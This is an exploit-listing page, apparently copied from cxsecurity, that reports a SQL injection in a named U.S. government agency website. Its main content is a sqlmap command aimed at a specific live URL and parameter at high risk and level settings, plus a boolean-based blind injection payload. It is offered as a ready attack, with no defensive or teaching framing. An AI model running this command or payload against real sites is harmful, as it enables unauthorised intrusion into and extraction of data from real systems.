Advertisement






U.S. Energy Information Administration (EIA) SQL Injection

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090051

Below is a copy:

U.S. Energy Information Administration (EIA) SQL Injection
# Exploit Title : U.S. Energy Information Administration (EIA) SQL Injection
# Author : rev0x
# Date : 05/09/2021
# Tested On : Kali Linux / Windows 10

python sqlmap.py -u "https://www.eia.gov/tools/faqs/faq.php?id=74" --dbs --level=3 --risk=3 --random-agent

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-2170 OR 6693=6693
---

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.